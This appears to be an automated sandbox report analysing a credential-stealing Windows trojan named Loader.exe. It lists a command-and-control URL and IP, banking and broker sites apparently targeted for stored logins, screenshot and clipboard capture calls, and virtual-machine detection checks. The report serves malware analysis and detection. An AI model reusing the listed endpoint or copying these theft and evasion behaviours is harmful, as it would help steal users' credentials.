              Source: Loader.exe, 00000001.00000002.2712486611.00000000013D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ingreem-eilish.biz:443/api
              Source: Loader.exe, 00000001.00000002.2712486611.00000000013D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ingreem-eilish.biz:443/apiK
              Source: Loader.exe, 00000001.00000002.2712486611.00000000013D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ingreem-eilish.biz:443/apiicrosoft
              Source: Loader.exe, 00000001.00000003.2616062233.00000000039E9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
              Source: Loader.exe, 00000001.00000003.2616062233.00000000039E9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
              Source: Loader.exe, 00000001.00000003.2568059409.00000000036FD000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000001.00000003.2568126964.00000000036FA000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000001.00000003.2568255337.00000000036FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
              Source: Loader.exe, 00000001.00000003.2568059409.00000000036FD000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000001.00000003.2568126964.00000000036FA000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000001.00000003.2568255337.00000000036FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
              Source: Loader.exe, 00000001.00000003.2616062233.00000000039E9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
              Source: Loader.exe, 00000001.00000003.2616062233.00000000039E9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
              Source: Loader.exe, 00000001.00000003.2616062233.00000000039E9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
              Source: Loader.exe, 00000001.00000003.2616062233.00000000039E9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
              Source: Loader.exe, 00000001.00000003.2616062233.00000000039E9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
              Source: Loader.exe, 00000001.00000003.2616062233.00000000039E9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
              Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
              Source: unknownHTTPS traffic detected: 104.21.90.135:443 -> 192.168.2.5:49756 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.90.135:443 -> 192.168.2.5:49761 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.90.135:443 -> 192.168.2.5:49767 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.90.135:443 -> 192.168.2.5:49773 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.90.135:443 -> 192.168.2.5:49780 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.90.135:443 -> 192.168.2.5:49786 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.90.135:443 -> 192.168.2.5:49792 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.90.135:443 -> 192.168.2.5:49799 version: TLS 1.2
              Source: C:\Users\user\Desktop\Loader.exeCode function: 1_2_004327B0 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,1_2_004327B0
              Source: C:\Users\user\Desktop\Loader.exeCode function: 1_2_004327B0 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,1_2_004327B0
              Source: C:\Users\user\Desktop\Loader.exeCode function: 1_2_004339F0 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,1_2_004339F0
              Source: C:\Users\user\Desktop\Loader.exeCode function: 1_2_00AFF080 NtAllocateVirtualMemory,1_2_00AFF080
              Source: C:\Users\user\Desktop\Loader.exeCode function: 1_2_00AFF5C0 NtProtectVirtualMemory,NtProtectVirtualMemory,1_2_00AFF5C0
              Source: C:\Users\user\Desktop\Loader.exeCode function: 1_2_00F030101_2_00F03010
              Source: C:\Users\user\Desktop\Loader.exeCode function: 1_2_00EF10001_2_00EF1000
              Source: C:\Users\user\Desktop\Loader.exeCode function: 1_2_00EFB9E01_2_00EFB9E0
              Source: C:\Users\user\Desktop\Loader.exeCode function: 1_2_00F1E1701_2_00F1E170
              Source: C:\Users\user\Desktop\Loader.exeCode function: 1_2_00EFC9701_2_00EFC970
              Source: C:\Users\user\Desktop\Loader.exeCode function: 1_2_011CF7111_2_011CF711
              Source: C:\Users\user\Desktop\Loader.exeCode function: 1_2_00F1DA801_2_00F1DA80
              Source: C:\Users\user\Desktop\Loader.exeCode function: 1_2_00F0DA501_2_00F0DA50
              Source: C:\Users\user\Desktop\Loader.exeCode function: 1_2_00EF6A301_2_00EF6A30
              Source: C:\Users\user\Desktop\Loader.exeCode function: 1_2_011C4A551_2_011C4A55
              Source: C:\Users\user\Desktop\Loader.exeCode function: 1_2_0043E8401_2_0043E840
              Source: C:\Users\user\Desktop\Loader.exeCode function: 1_2_0040A8C01_2_0040A8C0
              Source: C:\Users\user\Desktop\Loader.exeCode function: 1_2_0043A9701_2_0043A970
              Source: C:\Users\user\Desktop\Loader.exeCode function: 1_2_0040D1201_2_0040D120
              Source: C:\Users\user\Desktop\Loader.exeCode function: 1_2_00423A2A1_2_00423A2A
              Source: C:\Users\user\Desktop\Loader.exeCode function: 1_2_004272D01_2_004272D0
              Source: C:\Users\user\Desktop\Loader.exeCode function: 1_2_00421A801_2_00421A80
              Source: C:\Users\user\Desktop\Loader.exeCode function: 1_2_0042DB7F1_2_0042DB7F
              Source: C:\Users\user\Desktop\Loader.exeCode function: 1_2_00437BC01_2_00437BC0
              Source: C:\Users\user\Desktop\Loader.exeCode function: 1_2_0043EC801_2_0043EC80
              Source: C:\Users\user\Desktop\Loader.exeCode function: 1_2_004085D01_2_004085D0
              Source: C:\Users\user\Desktop\Loader.exeCode function: 1_2_0043F5E01_2_0043F5E0
              Source: C:\Users\user\Desktop\Loader.exeCode function: 1_2_004105F31_2_004105F3
              Source: C:\Users\user\Desktop\Loader.exeCode function: 1_2_0040C63C1_2_0040C63C
              Source: C:\Users\user\Desktop\Loader.exeCode function: 1_2_004377E01_2_004377E0
              Source: C:\Users\user\Desktop\Loader.exeCode function: 1_2_0043506D1_2_0043506D
              Source: C:\Users\user\Desktop\Loader.exeCode function: 1_2_004288891_2_00428889
              Source: C:\Users\user\Desktop\Loader.exeCode function: 1_2_004088B01_2_004088B0
              Source: C:\Users\user\Desktop\Loader.exeCode function: 1_2_004091501_2_00409150
              Source: C:\Users\user\Desktop\Loader.exeCode function: 1_2_004059501_2_00405950
              Source: C:\Users\user\Desktop\Loader.exeCode function: 1_2_0041A1501_2_0041A150
              Source: C:\Users\user\Desktop\Loader.exeCode function: 1_2_004301611_2_00430161
              Source: C:\Users\user\Desktop\Loader.exeCode function: 1_2_004141701_2_00414170
              Source: C:\Users\user\Desktop\Loader.exeCode function: 1_2_0043B1001_2_0043B100
              Source: C:\Users\user\Desktop\Loader.exeCode function: 1_2_0041910E1_2_0041910E
              Source: C:\Users\user\Desktop\Loader.exeCode function: 1_2_004039201_2_00403920
              Source: C:\Users\user\Desktop\Loader.exeCode function: 1_2_0041912E1_2_0041912E
              Source: C:\Users\user\Desktop\Loader.exeCode function: 1_2_004169301_2_00416930
              Source: C:\Users\user\Desktop\Loader.exeCode function: 1_2_0043E9D01_2_0043E9D0
              Source: C:\Users\user\Desktop\Loader.exeCode function: 1_2_004199E21_2_004199E2
              Source: C:\Users\user\Desktop\Loader.exeCode function: 1_2_004371801_2_00437180
              Source: C:\Users\user\Desktop\Loader.exeCode function: 1_2_0043D9801_2_0043D980
              Source: C:\Users\user\Desktop\Loader.exeCode function: 1_2_004111A61_2_004111A6
              Source: C:\Users\user\Desktop\Loader.exeCode function: 1_2_004062401_2_00406240
              Source: C:\Users\user\Desktop\Loader.exeCode function: 1_2_0041CA701_2_0041CA70
              Source: C:\Users\user\Desktop\Loader.exeCode function: 1_2_0041D2001_2_0041D200
              Source: C:\Users\user\Desktop\Loader.exeCode function: 1_2_0041FA101_2_0041FA10
              Source: C:\Users\user\Desktop\Loader.exeCode function: 1_2_00423A1C1_2_00423A1C
              Source: C:\Users\user\Desktop\Loader.exeCode function: 1_2_0041E2201_2_0041E220
              Source: C:\Users\user\Desktop\Loader.exeCode function: 1_2_0042822E1_2_0042822E
              Source: C:\Users\user\Desktop\Loader.exeCode function: 1_2_00426A301_2_00426A30
              Source: C:\Users\user\Desktop\Loader.exeCode function: 1_2_00409AC11_2_00409AC1
              Source: C:\Users\user\Desktop\Loader.exeCode function: 1_2_004042D01_2_004042D0
              Source: C:\Users\user\Desktop\Loader.exeCode function: 1_2_004162F11_2_004162F1
              Source: C:\Users\user\Desktop\Loader.exeCode function: 1_2_004242801_2_00424280
              Source: C:\Users\user\Desktop\Loader.exeCode function: 1_2_0043F2801_2_0043F280
              Source: C:\Users\user\Desktop\Loader.exeCode function: 1_2_0043DA801_2_0043DA80
              Source: C:\Users\user\Desktop\Loader.exeCode function: 1_2_00428A9B1_2_00428A9B
              Source: C:\Users\user\Desktop\Loader.exeCode function: 1_2_00424AA81_2_00424AA8
              Source: C:\Users\user\Desktop\Loader.exeCode function: 1_2_00402B401_2_00402B40
              Source: C:\Users\user\Desktop\Loader.exeCode function: 1_2_0041B3601_2_0041B360
              Source: C:\Users\user\Desktop\Loader.exeCode function: 1_2_004323701_2_00432370
              Source: C:\Users\user\Desktop\Loader.exeCode function: 1_2_0043DBF01_2_0043DBF0
              Source: C:\Users\user\Desktop\Loader.exeCode function: 1_2_00419BFF1_2_00419BFF
              Source: C:\Users\user\Desktop\Loader.exeCode function: 1_2_00435B981_2_00435B98
              Source: C:\Users\user\Desktop\Loader.exeCode function: 1_2_004223A01_2_004223A0
              Source: C:\Users\user\Desktop\Loader.exeCode function: 1_2_004383A01_2_004383A0
              Source: C:\Users\user\Desktop\Loader.exeCode function: 1_2_00411C401_2_00411C40
              Source: C:\Users\user\Desktop\Loader.exeCode function: 1_2_00404C601_2_00404C60
              Source: C:\Users\user\Desktop\Loader.exeCode function: 1_2_0042DB7A1_2_0042DB7A
              Source: C:\Users\user\Desktop\Loader.exeCode function: 1_2_0041542D1_2_0041542D
              Source: C:\Users\user\Desktop\Loader.exeCode function: 1_2_004144D51_2_004144D5
              Source: C:\Users\user\Desktop\Loader.exeCode function: 1_2_0040ECE01_2_0040ECE0
              Source: C:\Users\user\Desktop\Loader.exeCode function: 1_2_0043DC801_2_0043DC80
              Source: C:\Users\user\Desktop\Loader.exeCode function: 1_2_004074A01_2_004074A0
              Source: C:\Users\user\Desktop\Loader.exeCode function: 1_2_004294A11_2_004294A1
              Source: C:\Users\user\Desktop\Loader.exeCode function: 1_2_0040AD401_2_0040AD40
              Source: C:\Users\user\Desktop\Loader.exeCode function: 1_2_0041E5601_2_0041E560
              Source: C:\Users\user\Desktop\Loader.exeCode function: 1_2_0043DD001_2_0043DD00
              Source: C:\Users\user\Desktop\Loader.exeCode function: 1_2_004325C01_2_004325C0
              Source: C:\Users\user\Desktop\Loader.exeCode function: 1_2_0043ADE01_2_0043ADE0
              Source: C:\Users\user\Desktop\Loader.exeCode function: 1_2_0040E59D1_2_0040E59D
              Source: C:\Users\user\Desktop\Loader.exeCode function: 1_2_00419BFF1_2_00419BFF
              Source: C:\Users\user\Desktop\Loader.exeCode function: 1_2_004365B41_2_004365B4
              Source: C:\Users\user\Desktop\Loader.exeCode function: 1_2_0041B6501_2_0041B650
              Source: C:\Users\user\Desktop\Loader.exeCode function: 1_2_004096001_2_00409600
              Source: C:\Users\user\Desktop\Loader.exeCode function: 1_2_004166031_2_00416603
              Source: C:\Users\user\Desktop\Loader.exeCode function: 1_2_0041DE201_2_0041DE20
              Source: C:\Users\user\Desktop\Loader.exeCode function: 1_2_004386301_2_00438630
              Source: C:\Users\user\Desktop\Loader.exeCode function: 1_2_004186381_2_00418638
              Source: C:\Users\user\Desktop\Loader.exeCode function: 1_2_004066D01_2_004066D0
              Source: C:\Users\user\Desktop\Loader.exeCode function: 1_2_00415EDC1_2_00415EDC
              Source: C:\Users\user\Desktop\Loader.exeCode function: 1_2_00402EE01_2_00402EE0
              Source: C:\Users\user\Desktop\Loader.exeCode function: 1_2_004256911_2_00425691
              Source: C:\Users\user\Desktop\Loader.exeCode function: 1_2_004236991_2_00423699
              Source: C:\Users\user\Desktop\Loader.exeCode function: 1_2_00405EA01_2_00405EA0
              Source: C:\Users\user\Desktop\Loader.exeCode function: 1_2_00438F451_2_00438F45
              Source: C:\Users\user\Desktop\Loader.exeCode function: 1_2_0043EF601_2_0043EF60
              Source: C:\Users\user\Desktop\Loader.exeCode function: 1_2_0040DF041_2_0040DF04
              Source: C:\Users\user\Desktop\Loader.exeCode function: 1_2_00422F0D1_2_00422F0D
              Source: C:\Users\user\Desktop\Loader.exeCode function: 1_2_00414F1E1_2_00414F1E
              Source: C:\Users\user\Desktop\Loader.exeCode function: 1_2_00436F201_2_00436F20
              Source: C:\Users\user\Desktop\Loader.exeCode function: 1_2_004277801_2_00427780
              Source: C:\Users\user\Desktop\Loader.exeCode function: 1_2_0041E7901_2_0041E790
              Source: C:\Users\user\Desktop\Loader.exeCode function: 1_2_004277A01_2_004277A0
              Source: C:\Users\user\Desktop\Loader.exeCode function: 1_2_00423FA01_2_00423FA0
              Source: C:\Users\user\Desktop\Loader.exeCode function: 1_2_00AFE0001_2_00AFE000
              Source: C:\Users\user\Desktop\Loader.exeCode function: String function: 00414160 appears 69 times
              Source: C:\Users\user\Desktop\Loader.exeCode function: String function: 00407EB0 appears 57 times
              Source: Loader.exe, 00000001.00000000.2328628388.00000000011D9000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameBedWpostk.exe8 vs Loader.exe
              Source: Loader.exe, 00000001.00000003.2521460358.0000000002C3D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameBedWpostk.exe8 vs Loader.exe
              Source: Loader.exeBinary or memory string: OriginalFilenameBedWpostk.exe8 vs Loader.exe
              Source: Loader.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@1/0@1/1
              Source: C:\Users\user\Desktop\Loader.exeCode function: 1_2_00437BC0 CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW,1_2_00437BC0
              Source: Loader.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Users\user\Desktop\Loader.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: Loader.exe, 00000001.00000003.2589997046.0000000003760000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000001.00000003.2568570171.00000000036CB000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000001.00000003.2589781754.00000000036CC000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000001.00000003.2568408318.00000000036E8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: Loader.exeReversingLabs: Detection: 57%
              Source: C:\Users\user\Desktop\Loader.exeFile read: C:\Users\user\Desktop\Loader.exeJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeSection loaded: webio.dllJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: Loader.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
              Source: Loader.exeStatic file information: File size 3208704 > 1048576
              Source: Loader.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x2df200
              Source: Loader.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
              Source: Loader.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
              Source: Loader.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
              Source: Loader.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
              Source: Loader.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
              Source: Loader.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
              Source: Loader.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
              Source: Loader.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
              Source: Binary string: C:\Admin\Workspace\1199853044\Project\Release\Project.pdb source: Loader.exe
              Source: Loader.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
              Source: Loader.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
              Source: Loader.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
              Source: Loader.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
              Source: Loader.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
              Source: C:\Users\user\Desktop\Loader.exeCode function: 1_2_00F069BD push 03FFFFFFh; ret 1_2_00F069C2
              Source: C:\Users\user\Desktop\Loader.exeCode function: 1_2_00F05581 pushad ; iretd 1_2_00F05582
              Source: C:\Users\user\Desktop\Loader.exeCode function: 1_2_00F04692 push 81FFFFFFh; ret 1_2_00F04697
              Source: C:\Users\user\Desktop\Loader.exeCode function: 1_2_011CFE44 push ecx; ret 1_2_011CFE57
              Source: C:\Users\user\Desktop\Loader.exeCode function: 1_2_0043D950 push eax; mov dword ptr [esp], 71708F5Eh1_2_0043D951
              Source: C:\Users\user\Desktop\Loader.exeCode function: 1_2_0043AD30 push eax; mov dword ptr [esp], ADAEAFA0h1_2_0043AD3E
              Source: C:\Users\user\Desktop\Loader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Query firmware table information (likely to detect VMs)
              Source: C:\Users\user\Desktop\Loader.exeSystem information queried: FirmwareTableInformationJump to behavior
              Source: C:\Users\user\Desktop\Loader.exe TID: 3668Thread sleep time: -120000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
              Source: C:\Users\user\Desktop\Loader.exeCode function: 1_2_011C9255 FindFirstFileExW,1_2_011C9255
              Source: Loader.exe, 00000001.00000003.2589472932.00000000036F1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
              Source: Loader.exe, 00000001.00000003.2589472932.00000000036F1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696428655f
              Source: Loader.exe, 00000001.00000003.2589472932.00000000036F1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
              Source: Loader.exe, 00000001.00000003.2589472932.00000000036F1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
              Source: Loader.exe, 00000001.00000003.2589339784.0000000003763000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: - GDCDYNVMware20,11696428655p
              Source: Loader.exe, 00000001.00000003.2589472932.00000000036F1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696428655
              Source: Loader.exe, 00000001.00000003.2589472932.00000000036F1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
              Source: Loader.exe, 00000001.00000002.2712486611.00000000013BD000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000001.00000002.2712486611.000000000140C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: Loader.exe, 00000001.00000003.2589472932.00000000036F1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
              Source: Loader.exe, 00000001.00000003.2589472932.00000000036F1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
              Source: Loader.exe, 00000001.00000003.2589472932.00000000036F1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
              Source: Loader.exe, 00000001.00000003.2589472932.00000000036F1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
              Source: Loader.exe, 00000001.00000003.2589472932.00000000036F1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
              Source: Loader.exe, 00000001.00000003.2589472932.00000000036F1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
              Source: Loader.exe, 00000001.00000003.2589472932.00000000036F1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
              Source: Loader.exe, 00000001.00000003.2589472932.00000000036F1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696428655t
              Source: Loader.exe, 00000001.00000003.2589472932.00000000036F1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
              Source: Loader.exe, 00000001.00000003.2589472932.00000000036F1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
              Source: Loader.exe, 00000001.00000003.2589472932.00000000036F1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696428655s
              Source: Loader.exe, 00000001.00000003.2589472932.00000000036F1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
              Source: Loader.exe, 00000001.00000003.2589472932.00000000036F1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696428655
              Source: Loader.exe, 00000001.00000003.2589472932.00000000036F1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696428655
              Source: Loader.exe, 00000001.00000003.2589472932.00000000036F1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696428655o
              Source: Loader.exe, 00000001.00000003.2589472932.00000000036F1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
              Source: Loader.exe, 00000001.00000003.2589472932.00000000036F1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696428655t
              Source: Loader.exe, 00000001.00000003.2589472932.00000000036F1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696428655
              Source: Loader.exe, 00000001.00000003.2589472932.00000000036F1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
              Source: Loader.exe, 00000001.00000003.2589472932.00000000036F1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696428655j
              Source: Loader.exe, 00000001.00000003.2589472932.00000000036F1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
              Source: Loader.exe, 00000001.00000003.2589339784.0000000003763000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: YNVMware
              Source: Loader.exe, 00000001.00000003.2589472932.00000000036F1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
              Source: Loader.exe, 00000001.00000003.2589472932.00000000036F1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696428655x
              Source: Loader.exe, 00000001.00000003.2589472932.00000000036F1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
              Source: Loader.exe, 00000001.00000002.2712486611.000000000140C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWD
              Source: Loader.exe, 00000001.00000003.2589472932.00000000036F1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
              Source: C:\Users\user\Desktop\Loader.exeProcess information queried: ProcessInformationJump to behavior
